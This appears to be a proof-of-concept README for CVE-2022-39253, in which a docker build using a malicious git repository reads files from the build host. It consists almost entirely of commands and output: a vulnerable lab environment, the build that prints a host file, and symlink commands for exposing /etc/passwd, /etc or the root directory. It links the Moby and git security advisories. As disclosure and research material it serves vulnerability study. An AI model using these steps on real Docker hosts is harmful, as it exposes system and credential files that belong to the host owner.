docker host file read (using cve-2022-39253) poc

PoC

reproduce environment

$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait minutes for environment starting ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0

ubuntu login: root
Password: root

root@ubuntu:~# apt list --installed |grep "git/now"

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]

root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84

echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main

Sending build context to Docker daemon    234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete 
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
 ---> 334e4a014c81
Step 2/4 : COPY / /
 ---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
 ---> Running in e21e9a9c8294
-rw-r--r--    1 root     root           8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
 ---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
 ---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
 ---> 2330735e84e4
Successfully built 2330735e84e4

How to read other file or directory

ln -s /etc/passwd evil2/git/objects/host

or

ln -s /etc evil2/git/objects/host

You can even read the root directory /.

Security Advisories

• https://github.com/moby/moby/security/advisories/GHSA-vp35-85q5-9f25
• https://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85